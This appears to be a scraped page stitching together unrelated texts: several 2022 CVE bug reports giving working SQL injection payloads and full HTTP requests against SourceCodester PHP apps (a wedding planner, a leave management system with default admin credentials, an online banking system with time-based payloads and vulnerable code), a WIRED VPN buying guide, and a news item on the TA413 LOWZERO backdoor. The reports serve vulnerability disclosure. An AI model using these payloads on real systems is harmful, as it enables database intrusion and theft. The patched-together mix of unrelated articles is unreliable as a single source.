Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the booking parameter at /admin/client_assign.php.

Permalink

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: shark007

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/client\_assign.php?booking=

Vulnerability location: /Wedding-Management-PHP/admin/client\_assign.php?booking=, booking

\[+\] Payload: /Wedding-Management-PHP/admin/client\_assign.php?booking=-33%20union%20select%201,2,3,4,5,database(),7,8--+&user\_id=33

dbname = dbwedding

GET /Wedding\-Management\-PHP/admin/client\_assign.php?booking\=\-33%20union%20select%201,2,3,4,5,database(),7,8\--+&user\_id=33 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40402: Bug_report/SQLi-1.md at main · wshark00/Bug_report

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/feature_edit.php.

Permalink

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: shark007

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/feature\_edit.php?id=

Vulnerability location: /Wedding-Management-PHP/admin/feature\_edit.php?id=

\[+\] Payload: /Wedding-Management-PHP/admin/feature\_edit.php?id=-8%20union%20select%201,2,database(),4--+

dbname = dbwedding

GET /Wedding\-Management\-PHP/admin/feature\_edit.php?id\=\-8%20union%20select%201,2,database(),4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40403: Bug_report/SQLi-3.md at main · wshark00/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_leave_type.

Permalink

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_leave\_type

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_leave\_type,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_leave\_type HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40926: Bug_report/SQLi-2.md at main · admin77888/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_designation.

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

First create a table in the database

CREATE TABLE \`designation\_ist\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_designation

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_designation,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_designation HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40927: Bug_report/SQLi-1.md at main · admin77888/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_application.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_application

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_application,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_application HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40928: Bug_report/SQLi-3.md at main · admin77888/Bug_report

It won’t solve all of your privacy problems, but a virtual private network can make you a less tempting target for hackers.

A virtual private network (VPN) is like a protective tunnel you can use to pass through a public network, protecting your data from outside eyes. Whether you're worried about hiding your browsing activity from your internet service provider so it doesn't sell your data to advertisers, or you want to stay safe on a public Wi-Fi hot spot to keep nearby digital snoops from capturing your passwords, a VPN can help protect you.

However, while a VPN will keep you safe at your local coffee shop, it comes with a cost. Using a VPN means your VPN provider will know everything about your browsing habits. This makes VPN providers a target for hackers. Be sure you even need one before you read on.

Picking the right VPN service is serious business. Most VPN providers say they keep no logs of their users' activity, but this is rarely verified. You're stuck taking companies at their word. For this reason, we've limited our testing to VPN providers that have been independently audited by security firms and have published the results.

To help you sort out when and why you might want a VPN, as well as why you might not, be sure to read through our complete guide to VPNs below. If you're sure you want to use a VPN, here are our top picks among commercial VPN providers.

_Updated September 2022: We've included some updated speed test results, included some new features from Surfshark, and noted our experiences paying for Mullvad with bitcoin._

_Special offer for Gear readers: Get a_ _**1-year subscription to**_ **WIRED** _**for $5 ($25 off)**__. This includes unlimited access to_ WIRED._com and our print magazine (if you'd like). Subscriptions help fund the work we do every day._

> If you buy something using links in our stories, we may earn a commission. This helps support our journalism. Learn more.

Best for Most People

**Surfshark VPN**

Surfshark wouldn't be my top pick if my life depended on my VPN, but for most of us that's not the case. If you just want a way to get around some geographical restrictions on content (aka access Netflix) and protect your traffic while using an open Wi-Fi hot spot, Surfshark is a good choice. It's secure, and it provides a great value for the money if you pay for two years up front.

Surfshark offers a kill switch that automatically stops your traffic if your VPN connection fails, and it supports multihop VPN connects, which means your traffic goes from your machine to a VPN server to another VPN server, and then to the destination server. This provides an extra layer of protection should the VPN itself be compromised, though there is a corresponding speed hit when using a multihop connection. The company also recently added support for manual Wireguard configuration. Most people will be fine sticking with Surfshark's apps, but if you're trying to connect your entire network to Surfshark directly through a router, the manual configuration will be welcome news.

In my testing over the years, Surfshark has consistently had some of the best speeds of any VPN I've used. Yes, it is slower than not using a VPN, but I have never had any problem streaming HD content through Surfshark. It's fast enough that in most cases you won't notice any speed degradation at all.

Surfshark is based in the British Virgin Islands, which, although technically a territory of Great Britain, is generally considered a safe haven and has no data-retention laws. What I don't like is that Surfshark is legally untested. The company has a zero-log policy, and you can (and should) opt out of the diagnostic crash reports in the app. Still, you're taking Surfshark at its word when it says it won't keep logs of your internet activity. Encouragingly, the company's browser extensions have undergone an independent security audit that didn't turn up any significant problems. 

Surfshark recently merged with NordVPN. So far we have not noticed any changes for its customers, but we will be keeping an eye on it going forward.

**Surfshark costs $2.50 per month if you buy two years up front, $4 per month if you buy one year up front.**

Best for Advanced Users

**Mullvad VPN**

Mullvad is based in Sweden and first came to my attention because of its early support for WireGuard, a faster protocol for tunneling VPN traffic.

Another thing I like is Mullvad's system for accepting cash payments. If you prefer to remain totally anonymous, you can generate a random account number, write that number down on a slip of paper, and mail it, along with cash, to Sweden. In theory, no one will be able to connect you to that account. (The truly paranoid will don a tinfoil hat, wear gloves, print from a public printer, and mail from a remote mailbox.) I have not tested the cash option, but I did recently extend my Mullvad subscription using bitcoin and it worked without a hitch.

Part of what I like about Mullvad is its down-to-earth approach that doesn't overhype with its marketing and helps users take additional steps to protect their privacy. For example, the company has an entire page showing you how to disable WebRTC in your web browser. As long as WebRTC is enabled (and it is by default in most browsers), websites can view your actual IP address even when you use a VPN.

Mullvad offers apps for every major platform, as well as routers. The applications are all open source, and you can check the code yourself on GitHub. The service has been independently audited as well. Advanced users can download configuration files and use them directly with OpenVPN or Wireguard.

In my testing, speeds were very good. I never encountered a situation where I couldn't get a fast connection. Over the years Mullvad has become the VPN I rely on day-to-day.

**Mullvad VPN costs 5 euros (around $6) per month, cash or charge.**

Best for VPN Newcomers

**TunnelBear VPN**

Choosing a VPN can be overwhelming. If you're tired of security mumbo jumbo and lock icons, TunnelBear might be the VPN for you. Its cute bear animations help demystify what VPNs do, how they work, and what they can offer you. Sometimes the easiest way to make technology more approachable is to put a friendly face on it.

Don't worry though, TunnelBear isn't all cute bear animations. It has the same security features as other VPN providers, like a no-logging policy and a clear privacy policy, and it's been independently audited.

In my testing, speeds with TunnelBear were competitive with the other options listed here. One of my favorite parts of TunnelBear is the free trial option, which makes it easy to test-drive it and see what your speeds are like without committing. TunnelBear has fewer geographic server locations than some of our other options, but unless you're traveling abroad or need to get around a specific geo-restriction, that shouldn't matter for most users.

**TunnelBear costs $3.33 per month if you buy one year up front****.**

Best for Circumventing Geographic Restrictions

**NordVPN**

NordVPN is one of the most popular VPNs around, thanks to a wide selection of servers and reasonable prices. It's also one of the most reliable ways I've found to circumvent location-based restrictions. I used it extensively while living in Mexico to get around Netflix's geographic restrictions. That said, this is a cat-and-mouse game; Netflix is always updating its server ban list, so NordVPN might not work in the future.

NordVPN is based out of Panama, which is not part of the Five Eyes, Nine Eyes, or 14 Eyes jurisdictions. That doesn't mean your government can't spy on you, but it does at least mean it will have to put in some extra legwork to do it (yes, that's about where we are these days). NordVPN has been audited a number of times, most recently in June of last year, when third-party auditor VerSprite found nothing amiss. As noted above, NordVPN and Surfshark recently announced a merger. Both will continue to operate as separate entities, but they are now a single company.

NordVPN also recently added a new service dubbed Threat Protection, which will block web-based trackers, phishing attempts, some ads, and malicious websites. I have not tested it extensively, and I personally rely on browser-based plug-ins to block threats like this. But if you're looking for an all-in-one solution, this might work.

I've never had an issue with speed using NordVPN, and the user interface of its apps is dead simple. Just click the country you want to use and the app will take care of connecting and configuring everything for you. If you want manual control, you can connect by using NordVPN's configuration files.

**NordVPN costs $5 per month if you buy one year up front. It also has frequent sales on a two-year deal that works out to about $3 a month.**

Best for High-Risk Use Cases

**Tor**

If you're in a situation where personal security is of the utmost importance, do not rely on a VPN. Use Tor (ideally through Tails) instead.

Using the Tor network accomplishes some of the same things as a VPN, but it's a little bit different. Tor provides anonymity, meaning no one can figure out who you are, but not necessarily privacy. People still might be able to see what you're doing, they just won't know it's you doing it. (VPNs provide privacy because no one can see what you're doing while you're going out of a VPN tunnel, but you don't have anonymity because the VPN provider knows who you are.)

Tor is simple to set up. All you need to do is download the Tor browser, and it will connect you to the web. Once you're connected to the Tor network, you can browse the web as you normally would. Except everything will be slower. When using Tor, your request for a website hops around the Tor network, bouncing between servers, before emerging and connecting to the actual site you want to visit. This makes Tor slow, sometimes incredibly slow, but that's necessary to protect your anonymity. And yes, you can combine a VPN with Tor, though that's somewhat beyond the scope of this guide.

How We Picked

VPN providers like to claim they keep no logs, which means they know nothing about what you do using their services. There are a variety of reasons to be skeptical about this claim, namely because they have to have a user ID of some kind tied to a payment method, which means the potential exists to link your credit card number (and thus your identity) to your browsing activity.

For that reason, I mainly limited my testing to providers that have been subpoenaed for user data in the US or Europe and failed to produce the logs or have at least undergone a third-party security audit. While these criteria can't guarantee the providers aren't saving log data, this method of selection gives us a starting point for filtering through the hundreds of VPN providers. Unfortunately other factors also come into play, VPNs that once made our list—Like ExpressVPN—are sometimes sold to less reputable companies. In cases like ExpressVPN I chose to remove it mainly because I have no way to know if it remains trustworthy or not.

Using these criteria, I narrowed the field to the most popular, reputable VPN providers and began testing them over a variety of networks (4G, cable, FiOS, and plenty of painfully slow coffee shop networks) over the past nine months. I tested network speed and ease of use (how you connect), and I also considered available payment methods, how often connections dropped, and any slowdowns I encountered.

Why You Might Not Need a VPN

It's important to understand not just what a VPN can do, but also what it can't do. As noted above, VPNs act like a protective tunnel. A VPN shields you from people trying to snoop on your traffic while it's in transit between your computer and the website you're browsing or the service you're using.

Public networks that anyone can join—even if they have to use a password to connect—are easy hunting grounds for attackers who want to see your network data. If your data is being sent unencrypted—like if the website you're connecting to doesn't use the secure HTTPS method—the amount of information an attacker can gather from you can be disastrous. Web browsers make it easy to tell when your connection is secure. Just look for a green lock icon at the top of your screen next to the web address. These days, most websites connect using HTTPS, so you're probably fine. But if that green lock icon isn't there, as it sometimes isn't on school, library, and small business websites, anyone can view whatever data you're sending. Unless you're using a VPN, which hides all of your activity, even on unencrypted websites.

Just connecting to a VPN isn't enough. Be sure to check out our guide to using a VPN to make sure you have everything set up correctly.

A VPN also changes your IP address, which adds an additional layer of protection. By giving you a different IP address, a VPN can make it appear as though you're in a different physical location. So even if you're sitting in California, the website you're accessing will think you're in Canada, Hungary, Uruguay, or Thailand. Unfortunately, this method of obscuring your location is not airtight. Technology built into web browsers that's known as WebRTC can leak your true IP address even when you're using a VPN. If this is a concern, disable WebRTC in your browser before connecting to a VPN. Mullvad has instructions on how to disable WebRTC in most browsers.

It's debatable how much masking your IP address really helps protect your privacy in the first place. Your IP address is only one of many, many bits of data websites collect about you. If privacy is your concern, you're better off using web browsers (and extensions) that offer additional tools to protect your privacy. Mozilla Firefox has several of these tools available. Or if you want to get serious about it, use the ultra-private Tor browser as noted above.

To add to the confusion around VPNs, providers—even some I've recommended here, unfortunately—often engage in misleading marketing. Nearly every VPN service website I visited had some kind of red banner claiming I was “not protected,” even when I was using a VPN at the time. The problem is that I wasn't using _their_ VPN. More honest VPN providers, like Mullvad, tell you what's actually happening: “You're not protected _by Mullvad_.” Kudos to Mullvad for not using fear to sell subscriptions.

Either way, the important thing to remember is that using a VPN does not make you anonymous. While VPNs may not be able to do much to protect your privacy, they are an essential tool when it comes to protecting you from snoops trying to gather your unencrypted data sent over insecure networks.

The Best VPNs to Protect Yourself Online

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities.
Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO** as part of an espionage campaign aimed at Tibetan entities.

Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.

The intrusions involved the exploitation of CVE-2022-1040 and CVE-2022-30190 (aka "Follina"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.

"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies," Recorded Future said in a new technical analysis.

TA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed FriarFox.

The group's exploitation of the Follina flaw was previously highlighted by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.

Also put to use in a spear-phishing attack identified in May 2022 is a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This is achieved by employing a Royal Road RTF weaponizer tool, which is widely shared among Chinese threat actors.

In another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.

LOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.

"The group continues to incorporate new capabilities while also relying on tried-and-tested \[tactics, techniques, and procedures," the cybersecurity firm said.

"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of wider trends with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor

Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/send_funds.php.

Permalink

**Vulnerability file address**

net-banking/send_funds.php from line 9,The $_GET['cust_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the $id is not protected from sql injection, line 13 $result0 = $conn->query($sql0); made a sql query,resulting in sql injection

......
......
......
    if (isset($\_GET\['cust\_id'\])) {
        $id = $\_GET\['cust\_id'\];
    }

    $sql0 = "SELECT \* FROM customer WHERE cust\_id=".$id;
    $result0 = $conn\->query($sql0);
    $row0 = $result0\->fetch\_assoc();
......
......
......

**POC**

GET /net-banking/send\_funds.php?cust\_id=666 AND (SELECT 1043 FROM (SELECT(SLEEP(5)))rbwc) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

**Attack results pictures**

CVE-2022-40113: BugReport/sql_injection3.md at main · 0clickjacking0/BugReport

Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/edit_customer.php.

**Vulnerability file address**

net-banking/edit_customer.php from line 16,The $_GET['cust_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 23 $result0 = $conn->query($sql0); made a sql query,resulting in sql injection

......
......
......
    if (isset($\_GET\['cust\_id'\])) {
        $\_SESSION\['cust\_id'\] = $\_GET\['cust\_id'\];
    }

    $sql0 = "SELECT \* FROM customer WHERE cust\_id=".$\_SESSION\['cust\_id'\];
    $sql1 = "SELECT \* FROM passbook".$\_SESSION\['cust\_id'\]." WHERE trans\_id=(
                    SELECT MAX(trans\_id) FROM passbook".$\_SESSION\['cust\_id'\].")";

    $result0 = $conn\->query($sql0);
......
......
......

**POC**

GET /net-banking/edit\_customer.php?cust\_id=666 AND (SELECT 5721 FROM (SELECT(SLEEP(5)))pcwq) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

**Attack results pictures**

CVE-2022-40114: Found a vulnerability · Issue #16 · zakee94/online-banking-system

Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/delete_beneficiary.php.

Permalink

**Vulnerability file address**

net-banking/delete_beneficiary.php from line 17,The $_GET['cust_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 21 if (($conn->query($sql0) === TRUE)) made a sql query,resulting in sql injection

......
......
......
if (isset($\_GET\['cust\_id'\])) {
        $sql0 = "DELETE FROM beneficiary".$\_SESSION\['loggedIn\_cust\_id'\].
                " WHERE benef\_cust\_id=".$\_GET\['cust\_id'\];
    }

    $success = 0;
    if (($conn\->query($sql0) === TRUE)) {
        $sql0 = "SELECT MAX(benef\_id) FROM beneficiary".$\_SESSION\['loggedIn\_cust\_id'\];
        $result = $conn\->query($sql0);
        $row = $result\->fetch\_assoc();
......
......
......

**POC**

GET /net-banking/delete\_beneficiary.php?cust\_id=666 AND 3629=BENCHMARK(5000000,MD5(0x7a6f6b4e)) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3
Upgrade-Insecure-Requests: 1

**Attack results pictures**

Tag

#firefox